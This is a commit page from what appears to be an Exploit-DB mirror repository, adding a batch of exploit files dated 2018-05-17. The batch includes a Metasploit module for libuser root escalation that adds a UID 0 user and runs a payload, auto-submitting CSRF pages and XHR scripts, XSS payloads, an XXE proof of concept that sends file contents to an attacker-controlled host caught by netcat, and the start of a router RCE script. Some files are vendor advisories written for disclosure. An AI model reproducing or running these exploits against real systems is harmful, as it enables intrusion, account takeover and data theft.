bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-17

Browse source 
12 changes to exploits/shellcodes

WhatsApp 2.18.31 - Memory Corruption
Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation
Libuser - roothelper Privilege Escalation (Metasploit)

Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution
MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery
VirtueMart 3.1.14 - Persistent Cross-Site Scripting
Rockwell Scada System 27.011 - Cross-Site Scripting
Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting
Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery
totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery
WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery
RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-05-17 05:01:47 +00:00
parent daa3579622
commit 1873a7d234
13 changed files with 994 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

144
exploits/asp/webapps/44631.html Normal file
View file

@ -0,0 +1,144 @@
<!--
################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: totemomail Encryption Gateway
# Vendor: totemo AG
# CSNC ID: CSNC-2018-003
# CVE ID: CVE-2018-6563
# Subject: Cross-Site Request Forgery
# Risk: High
# Effect: Remotely exploitable
# Author: Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 14.05.2018
#
################################################################################
Introduction:
-------------
The totemomail Encryption Gateway protects email communication with any external
partner by encryption. It doesn't matter whether you exchange emails with
technically savvy communication partners or with those who have neither an
appropriate infrastructure nor the necessary know-how. The encryption gateway
also makes it easy to securely send very large attachments.[1]
Compass Security discovered a vulnerability in the webmail part of the
solution. It is possible to predict all parameters that are required to
execute actions on the webmail interface. This allows an attacker to perform
Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a malicious web
page that will automatically send a request to the Encryption Gateway. If the
user is logged in, the request will be executed by the Encryption Gateway on
behalf of the logged in user. This could be used to change a user's settings, send emails or
change contact informations.
Affected:
---------
Vulnerable:
* 6.0.0_Build_371
No other version was tested but is is likely that older versions are affected as
well.
Technical Description
---------------------
In the webmail, no anti-CSRF token is used. Although the viewState makes the
attack more complex, it is possible to entirely predict the requests and thus,
perform CSRF attacks. The requirement here is to perform the attack as a replay of a full
user interaction. One has to replay every request to make sure that the viewState is
updated on the server side and corresponds to the action that is performed by
the malicious page.
Such a malicious page is presented below, it will automatically send 3 requests
that will change the user's detail:
==========
-->
<html>
<body>
<script>
function submitRequest1()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function submitRequest2()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function submitRequest3()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest1();
submitRequest2();
submitRequest3();
</script>
</body>
</html>
<!--
==========
Workaround / Fix:
-----------------
Install an up to date version of totemomail Encryption Gateway.
As a developer, the requests that execute actions must include an unpredictable
element. This is usually done by using an anti-CSRF token. This token is a
random value tied to the user's session and must be verified by the server
before executing any action on behalf of the user.
Timeline:
---------
2018-05-14: Coordinated public disclosure date
2018-03-XX: Release of fixed version 6.0_b511
2018-02-13: Initial vendor response
2018-02-09: Initial vendor notification
2018-02-02: Assigned CVE-2018-6563
2018-01-11: Discovery by Nicolas Heiniger
References:
-----------
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption
-->

29
exploits/hardware/remote/44635.py Executable file
View file

@ -0,0 +1,29 @@
'''
Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.
This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.
'''
#!/usr/bin/python3
import json
import sys
import socket
import os
import time
from websocket import create_connection
def ubusAuth(host, username, password):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":["00000000000000000000000000000000","session","login",
{"username": username,"password":password}],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
key = response.get('result')[1].get('ubus_rpc_session')
except IndexError:
return(None)
return(key)

81
exploits/ios/dos/44629.py Executable file
View file

File diff suppressed because one or more lines are too long

254
exploits/java/webapps/44634.txt Normal file
View file

@ -0,0 +1,254 @@
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
=======================================================================
title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
fixed version: 8.3 P1 and later
CVE number: CVE-2018-1247
impact: High
homepage: https://www.rsa.com
found: 2017-11-16
by: Mantas Juskauskas (Office Vilnius)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.
SEC Consult recommends to apply the available patches from the vendor.
Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)
2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.
The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.
3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.
The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.
Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.
Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.
For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==========================================================================================
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: <host>:7004
Cookie: [snip]
[snip]
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
<key>
&e1;
</key>
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"
[snip]
==========================================================================================
In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==========================================================================================
# cat /var/www/a.dtd
<!ENTITY % p1 SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">
%p2;
==========================================================================================
Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked to a remote listener controlled by the attacker:
==========================================================================================
# nc -nlvp 8080
listening on [any] 8080 ...
connect to [<attacker>] from (UNKNOWN) [<host>] 32817
GET /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1
==========================================================================================
Similarly, contents of other internal files can be obtained from the affected
system with current service user permissions.
2) Cross-site Flashing
The issue affects a third party component pmfso (DSA-2018-082).
To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
it is sufficient to click the following URL:
https://<host>:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")//
3) DOM based Cross-site Scripting
Example 1:
The issue affects a third party component PopCalendarX (CVE-2017-9072).
To exploit DOM based reflected cross-site scripting it is enough to trick a
victim into executing the following JavaScript (e.g. by clicking on a
specially crafted link):
==========================================================================================
<script>
window.name = "gToday:#' onload='alert(document.domain)' ";
location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";
</script>
==========================================================================================
Example 2:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.
Example 3:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.
Vulnerable / tested versions:
-----------------------------
The identified vulnerabilities have been verified to exist in the
RSA Authentication Manager, version 8.2.1.4.0-build1394922 which was the latest
version available during the test.
Vendor contact timeline:
------------------------
2017-11-23: Contacting vendor through security_alert@emc.com
2017-11-24: Vendor confirms the information was received, forwards it
to the responsible team for investigation and assigns tickets.
2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
plan is being determined.
2018-01-04: Contacting vendor for a status update.
2018-01-04: Vendor provides a possible fix date.
2018-02-21: Vendor provides a status update regarding the fix release date.
2018-04-24: Vendor contacts for credit text approval.
2018-05-08: Contacting vendor for the reason of uncoordinated public
release and status information
2018-05-08: Vendor provides an update regarding their public release and
status of vulnerabilities not included in the release, vendor info:
* DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
was released on 5/4
* DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
was released on 5/3
2018-05-16: Security advisory release
Solution:
---------
The vendor has released an advisory that contains recommendations of how to
resolve the reported XML External Entity Injection Vulnerability:
DSA-2018-086 - https://community.rsa.com/docs/DOC-92085 - (RSA Link Sign On Required)
Full Disclosure archive:
http://seclists.org/fulldisclosure/2018/May/18
Note: the suggested resolution also provides a fix for the Cross-site Flashing
and DOM based Cross-site Scripting (only Example 1) issues provided in the
descriptions above.
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF M. Juskauskas / @2018

275
exploits/linux/local/44633.rb Executable file
View file

@ -0,0 +1,275 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Libuser roothelper Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Red Hat based Linux
systems, including RHEL, Fedora and CentOS, by exploiting a newline
injection vulnerability in libuser and userhelper versions prior to
0.56.13-8 and version 0.60 before 0.60-7.
This module makes use of the roothelper.c exploit from Qualys to
insert a new user with UID=0 in /etc/passwd.
Note, the password for the current user is required by userhelper.
Note, on some systems, such as Fedora 11, the user entry for the
current user in /etc/passwd will become corrupted and exploitation
will fail.
This module has been tested successfully on libuser packaged versions
0.56.13-4.el6 on CentOS 6.0 (x86_64);
0.56.13-5.el6 on CentOS 6.5 (x86_64);
0.60-5.el7 on CentOS 7.1-1503 (x86_64);
0.56.16-1.fc13 on Fedora 13 (i686);
0.59-1.fc19 on Fedora Desktop 19 (x86_64);
0.60-3.fc20 on Fedora Desktop 20 (x86_64);
0.60-6.fc21 on Fedora Desktop 21 (x86_64);
0.60-6.fc22 on Fedora Desktop 22 (x86_64);
0.56.13-5.el6 on Red Hat 6.6 (x86_64); and
0.60-5.el7 on Red Hat 7.0 (x86_64).
RHEL 5 is vulnerable, however the installed version of glibc (2.5)
is missing various functions required by roothelper.c.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Jul 24 2015',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'roothelper.c' ],
[ 'EDB', '37706' ],
[ 'CVE', '2015-3245' ],
[ 'CVE', '2015-3246' ],
[ 'BID', '76021' ],
[ 'BID', '76022' ],
[ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],
[ 'URL', 'https://access.redhat.com/articles/1537873' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def password
datastore['PASSWORD'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def live_compile?
compile = false
if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
compile = true
else
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
end
compile
end
def check
userhelper_path = '/usr/sbin/userhelper'
unless setuid? userhelper_path
vprint_error "#{userhelper_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{userhelper_path} is setuid"
unless command_exists? 'script'
vprint_error "script is not installed. Exploitation will fail."
return CheckCode::Safe
end
vprint_good 'script is installed'
if cmd_exec('lsattr /etc/passwd').include? 'i'
vprint_error 'File /etc/passwd is immutable'
return CheckCode::Safe
end
vprint_good 'File /etc/passwd is not immutable'
glibc_banner = cmd_exec 'ldd --version'
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
if glibc_version.to_s.eql? ''
vprint_error 'Could not determine the GNU C library version'
return CheckCode::Detected
end
# roothelper.c requires functions only available since glibc 2.6+
if glibc_version < Gem::Version.new('2.6')
vprint_error "GNU C Library version #{glibc_version} is not supported"
return CheckCode::Safe
end
vprint_good "GNU C Library version #{glibc_version} is supported"
CheckCode::Detected
end
def exploit
if check == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
# Upload Qualys' roothelper.c exploit:
# - https://www.exploit-db.com/exploits/37706/
path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'
fd = ::File.open path, 'rb'
c_code = fd.read fd.stat.size
fd.close
upload "#{executable_path}.c", c_code
output = cmd_exec "gcc -o #{executable_path} #{executable_path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{executable_path}.c failed to compile"
end
cmd_exec "chmod +x #{executable_path}"
register_file_for_cleanup executable_path
else
vprint_status 'Dropping pre-compiled exploit on system...'
# Cross-compiled with:
# - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c
path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'
fd = ::File.open path, 'rb'
executable_data = fd.read fd.stat.size
fd.close
upload_and_chmodx executable_path, executable_data
end
# Run roothelper
timeout = 180
print_status "Launching roothelper exploit (Timeout: #{timeout})..."
output = cmd_exec "echo #{password.gsub(/'/, "\\\\'")} | #{executable_path}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"}
register_file_for_cleanup $1
end
if output =~ /died in parent: .*.c:517: forkstop_userhelper/
fail_with Failure::NoAccess, 'Incorrect password'
end
@username = nil
if output =~ /Exploit successful, run "su ([a-z])" to become root/
@username = $1
end
if @username.blank?
fail_with Failure::Unknown, 'Something went wrong'
end
print_good "Success! User '#{@username}' added to /etc/passwd"
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Execute payload executable
vprint_status 'Executing payload...'
cmd_exec "script -c \"su - #{@username} -c #{payload_path}\" | sh & echo "
register_file_for_cleanup 'typescript'
end
#
# Remove new user from /etc/passwd
#
def on_new_session(session)
new_user_removed = false
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
# Remove new user
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\""
# Wait for clean up
Rex.sleep 5
# Check for new user in /etc/passwd
passwd_contents = session.fs.file.open('/etc/passwd').read.to_s
unless passwd_contents =~ /^#{@username}:/
new_user_removed = true
end
elsif session.type.to_s.eql? 'shell'
# Remove new user
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' /etc/passwd"
# Check for new user in /etc/passwd
passwd_user = session.shell_command_token "grep '#{@username}:' /etc/passwd"
unless passwd_user =~ /^#{@username}:/
new_user_removed = true
end
end
unless new_user_removed
print_warning "Could not remove user '#{@username}' from /etc/passwd"
end
rescue => e
print_error "Error during cleanup: #{e.message}"
ensure
super
end
end

32
exploits/linux/webapps/44628.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery
# Date: 2018-05-15
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725
# CVE: N/A
# Version: 1.5.7
# Tested on: Kali linux
# Details:
# Horse Market Sell & Rent Portal Script has CSRF vulnerability which attacker can change user information.
# Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://geniuscript.com/horse-script/index.php/frontend/myprofile/en" method="POST">
<input type="hidden" name="name&#95;surname" value="D3C0DE" />
<input type="hidden" name="username" value="L0RD" />
<input type="hidden" name="password" value="anything" />
<input type="hidden" name="password&#95;confirm" value="anything" />
<input type="hidden" name="address" value="Cyro&#32;trento&#32;23" />
<input type="hidden" name="description" value="My&#32;description&#32;2" />
<input type="hidden" name="phone" value="&#43;10101010" />
<input type="hidden" name="mail" value="lord&#64;gmail&#46;com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

20
exploits/php/webapps/44624.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: MyBB Admin Notes Plugin - CSRF
# Date: 2018-05-14
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106
# Version: 1.1
# Tested on: Ubuntu 18.04
# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.
# 2. Proof of Concept:
<html>
<body>
<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
</body>
</html>
# 3. Solution:
# Update to the latest release
# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split

15
exploits/php/webapps/44625.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: VirtueMart 3.1.14 - Persistent Cross-Site Scripting
# Date: 2018-02-25
# Software Link: http://virtuemart.net/
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-7465
# Category: webapps
# 1. Description
# An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the admin area of the plugin can be closed by simply adding </textarea> to the value and saving the product/config. By editing back the product/config, the editor's browser will execute everything after the </textarea>, leading to a possible XSS.
# 2. Proof of Concept
Having the permissions to edit the config/products, you can simply write </textarea><script>alert(1)</script> inside a textarea, when someone will edit it back the alert will execute on the editor's browser
# 3. Solution: Upgrade to 3.2.14
# http://virtuemart.net/news/489-virtuemart-3-2-14-security-release-and-enhanced-invoice-handling

15
exploits/php/webapps/44627.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Multiplayer BlackJack - Online Casino Game 2.5 - Persistent Cross-Site scripting
# Date: 2018-05-16
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/multiplayer-blackjack-online-casino-game/15411706?s_rank=1628
# CVE: N/A
# Version: 2.5
# Description : Multiplayer BlackJack - Online Casino Game script has persistent cross site scripting that attacker
# can set malicious payload into the vulnerable parameter.
# POC :
1) click on the "sit" button in the web page
2) Put this payload into the "name" input and set wallet number :
<script>alert(document.domain)</script>
3) You will get an alert box in the page .

62
exploits/php/webapps/44632.html Normal file
View file

@ -0,0 +1,62 @@
<!--
Details
================
Software: Metronet Tag Manager
Version: 1.2.7
Homepage: https://wordpress.org/plugins/metronet-tag-manager/
Advisory report: https://advisories.dxw.com/advisories/csrf-metronet-tag-manager/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF in Metronet Tag Manager allows anybody to do almost anything an admin can
Vulnerability
================
The pluginas settings page sends a nonce, and checks it when displaying the success/failure message, but is not checked when setting options.
This option is meant to contain JavaScript for Google Tag Manager, so itas displayed on every frontend page without escaping.
As this vulnerability allows adding arbitrary JavaScript, the attacker can use it to control an admin useras browser to do almost anything an admin user can do.
Proof of concept
================
-->
Press submit on a page containing the following HTML snippet:
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=metronet-tag-manager\">
<input type=\"text\" name=\"submit\" value=\"1\">
<input type=\"text\" name=\"gtm-code-head\" value=\"<script>alert(1)</script>\">
<input type=\"submit\">
</form>
<!--
In a real attack, the form can be made to autosubmit so the victim only has to follow a link.
Mitigations
================
Upgrade to version 1.2.9 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2018-04-13: Discovered
2018-04-16: Reported to plugin author via Facebook private message
2018-04-17: Plugin author confirmed receipt of message
2018-04-24: Plugin changelog indicates bug has been fixed in 1.2.9
2018-05-15: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->

36
exploits/windows/local/44630.txt Normal file
View file

@ -0,0 +1,36 @@
Windows: Token Trust SID Access Check Bypass EOP
Platform: Windows 10 1709 (also tested current build of RS4)
Class: Elevation of Privilege
Summary: A tokens trust SID isnt reset when setting a token after process creation allowing a user process to bypass access checks for trust labels.
Description:
When a protected process is created it sets the protection inside the EPROCESS structure but also adds a special trust SID to the primary token as part of SeSubProcessToken. Where the process protection is used for things such as what access rights to other processes the trust SID is used for direct access checks where a security descriptor has a process trust label. A good example is the \KnownDlls object directory which is labeled as PPL-WinTcb to prevent tampering from anything not at that protection level.
This trust SID isnt cleared during duplication so its possible for a non-protected process to open the token of a protected process and duplicate it with the trust SID intact. However using that token should clear the SID, or at least cap it to the maximum process protection level. However theres a missing edge case, when setting a primary token through NtSetInformationProcess (specifically in PspAssignPrimaryToken). Therefore we can exploit this with the following from a normal non-admin process:
1) Create a protected process, werfaultsecure.exe is a good candidate as itll run PP-WinTcb. It doesnt have to do anything special, just be created.
2) Open the process token (we get PROCESS_QUERY_LIMITED_INFORMATION) and duplicate it to a new primary token.
3) Create a new suspended process which will run the exploit code with the original token.
4) Set the protected process token using NtSetInformationProcess
5) Resume exploit process and do something which needs to pass the trust label check.
NOTE: There is also a related issue during impersonation and the call to SeTokenCanImpersonate. Normally the current process trust SID is checked against the impersonation token trust SID and if the process tokens is lower a flag is returned to the caller which resets the new tokens trust SID to the process one. This check occurs before the check for SeImpersonatePrivilege but _after_ the check for an anonymous token authentication ID. Therefore if youre an admin you could craft a token with the anonymous token authentication ID (but with actual groups) and do a similar trick as with the process token to prevent the reset of the trust SID during impersonation. However I couldnt find an obvious use for this as the trust label seems to be based on the minimum between the impersonation and process tokens trust SIDs and when impersonating over a boundary such as in RPC it looks like it gets reset to the process protection level. But might be worth cleaning this up as well if youre there.
Proof of Concept:
Ive provided a PoC as a C# project. It does the previous described trick to run a process which can then set the trust label on a new event object it creates (\BaseNamedObject\PPDEMO). If you run the poc with a command line parameter it will try and do the event creation but should print access denied.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the poc with no parameters as a normal user. It will capture the token and respawn itself to create the event.
Expected Result:
Setting the trust label returns access denied.
Observed Result:
The trust label is successfully set.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44630.zip

19
exploits/windows/webapps/44626.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Rockwell Scada System - Cross-Site Scripting
# Date: 2018-05-16
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://rockwellautomation.com/
# Software Link: http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?famID=4
# Version: 1769-L16ER-BB1B, Version 27.011 and earlier, 1769-L18ER-BB1B, Version 27.011 and earlier,
# 1769-L18ERM-BB1B, Version 27.011 and earlier, 1769-L24ER-QB1B,
# Version 27.011 and earlier, 1769-L24ER-QBFC1B
# Version 27.011 and earlier, 1769-L27ERM-QBFC1B, Version 27.011 and earlier
# 1769-L30ER Version 27.011 and earlier, 1769-L30ERM, Version 27.011 and earlier,
# 1769-L30ER-NSE, Version 27.011 and earlier
